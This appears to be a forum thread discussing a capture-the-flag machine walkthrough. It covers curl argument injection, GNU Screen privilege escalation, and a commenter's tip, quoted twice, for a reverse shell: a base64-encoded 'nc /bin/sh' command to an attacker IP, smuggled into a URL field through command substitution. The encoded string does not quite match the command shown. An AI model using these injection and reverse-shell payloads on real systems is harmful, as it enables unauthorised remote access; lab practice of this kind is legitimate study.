01:45 - GoBuster: Discover exposed.php
04:40 - Exploiting exposed.php: Curl Argument Injection
11:40 - Getting Shell: nc, python3 to import pty.
20:09 - Screen Privesc: GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit
Saw your video, nice walkthrough, that bug with gcc where you had to modify the PATH had me scratching my head
I thought some might be interested by how I did the initial shell.
might be useful if you can’t find a web app folder where you can write
- base64 encode your shell command for reverse shell i.e
echo “nc -c /bin/sh 10.10.15.152 4444” | base64
→ bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= - send request with field populated as such:
http://localhost/test.html$($(echo bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d)) - enjoy your shell
if | was not allowed in payload you can first write to some file in /tmp and then decode that file afterwards.
Hope some find it useful.
@sajkox said:
I thought some might be interested by how I did the initial shell.
might be useful if you can’t find a web app folder where you can write
- base64 encode your shell command for reverse shell i.e
echo “nc -c /bin/sh 10.10.15.152 4444” | base64
→ bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo=- send request with field populated as such:
http://localhost/test.html$($(echo bmMgLWkgL2Jpbi9zaCAxMC4xMC4xNS4xNTIgNDQ0NAo= |base64 -d))- enjoy your shell
if | was not allowed in payload you can first write to some file in /tmp and then decode that file afterwards.
Hope some find it useful.
Great info! Thanks for the tip.